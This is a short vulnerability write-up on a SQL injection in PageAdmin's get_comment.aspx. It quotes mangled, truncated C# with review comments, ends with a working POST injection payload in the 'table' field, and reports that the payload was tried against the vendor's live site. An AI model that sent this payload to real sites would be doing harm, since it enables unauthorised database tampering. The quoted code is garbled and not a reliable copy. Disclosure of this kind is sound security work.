PageAdmin SQL injection vulnerability and fix
/E/aspx/get_comment.aspx
/*
 * Page_Load handler of /E/aspx/get_comment.aspx as quoted in the write-up.
 * The listing is whitespace- and case-mangled and truncated (the closing
 * braces of the else-branch, of the post == "add" branch and of the method
 * are missing), so read it for structure rather than as compilable C#.
 *
 * Input handling, as far as this excerpt shows:
 *  - DetailId, SiteId, Checked and IsMember are rejected unless IsNum()
 *    accepts them; Content and UserName pass through Replace_String(); the
 *    INSERT routes Table, UserName, Content and Quote through SQL_Format().
 *  - Table is read from Request.form["table"] and is otherwise not
 *    validated: the UPDATE further down concatenates it (and DetailId)
 *    straight into the statement, which is the point the author marks
 *    "// table injection". A table name cannot be bound as a query
 *    parameter, so NOTE(review): accept Table only from an allow-list of
 *    the expected comment tables, and bind DetailId as a parameter.
 *  - IsMember is only checked for being numeric: the Session["YZM"] code
 *    check runs for "0" and the member check for "1", so any other numeric
 *    value skips both. NOTE(review): restrict IsMember to exactly "0"/"1".
 */
Protected void Page_Load (Object src, EventArgs e) {string SQL; OleDbCommand comm; Conn theconn = new Conn (); if (Request. form ["post"] = "add") {IsMember = Request. form ["ismember"]; if (IsMember = "0") {Md5 JM = new Md5 (); if (Session ["YZM"] = null) {Response. write ("yzm error"); Response. end ();} else if (Request. form ["code"]! = Session ["YZM"]. toString () {Response. write ("yzm error"); Response. end () ;}} Table = Request. form ["table"]; // obtain the parameter DetailId = Request. form ["id"]; string UserName = Request. form ["username"]; string Password = Request. form ["code"]; string Quote = Request. form ["quote"]; string Content = Request. form ["content"]; string Checked = Request. form ["checked"]; Checked = "0 "? "1": "0"; string SiteId = Request. form ["siteid"]; LoginUserName = ""; IP = GetClientIP (); if (Content = "" |! IsNum (Checked) |! IsNum (DetailId) |! IsNum (SiteId) |! IsNum (IsMember) {Response. write ("input error"); Response. end () ;}else {Check_Post (); conn = new OleDbConnection (theconn. constr (); conn. open (); // Get_Set (int. parse (SiteId); Check_TimeLimit (); // check interval; if (Comment_MaxLength! = 0 & Content. length> Comment_MaxLength) // check the maximum character {conn. close (); Response. write ("maxleng_limit," + Comment_MaxLength); Response. end () ;}check_forbid (Content); // check the forbidden keyword Content = Replace_String (Content); // replace UserName = Replace_String (UserName ); // replace // process the content if (IsMember = "1") // check the user. Only 1 is detected. This skips the {if (Request. cookies ["Member"]! = Null) {Member_Valicate MCheck = new Member_Valicate (); MCheck. member_Check (); UserName = MCheck. _ UserName;} else {Check_Member (UserName, Password); // check username and Password} SQL = "insert into pa_comments (site_id, thetable, [detail_id], [UserName], [content], [quote], [checked], [ip], thedate, [ismember]) values ("+ int. 
parse (SiteId) + ", '" + SQL _Format (Table) + "'," + int. parse (DetailId) + ", '" + SQL _Format (UserName) + "', '" + SQL _Format (Content) + "', '" + SQL _Format (Quote) + "', "+ int. parse (Checked) + ", '" + IP + "', '" + DateTime. now + "'," + int. parse (IsMember) + ")"; comm = new OleDbCommand (SQL, conn); comm. executeNonQuery (); /* sink: Table is concatenated here without SQL_Format or any allow-list check */ SQL = "update" + Table + "set comments = comments + 1 where id =" + DetailId; // table injection comm = new OleDbCommand (SQL, conn); comm. executeNonQuery (); Response. write (Checked); conn. close (); Response. end ();}
Test method: I tested against the official site, http://www.pageadmin.net/e/aspx/get_comments.aspx, by POST-submitting: post = add & table = pa_comments set ip = 1 where 1 = 1 and 1 = user -- & id = 1 & siteid = 1 & ismember = 12 & checked = 1 & content = 1
Solution: filter the `table` input before it is used in the query.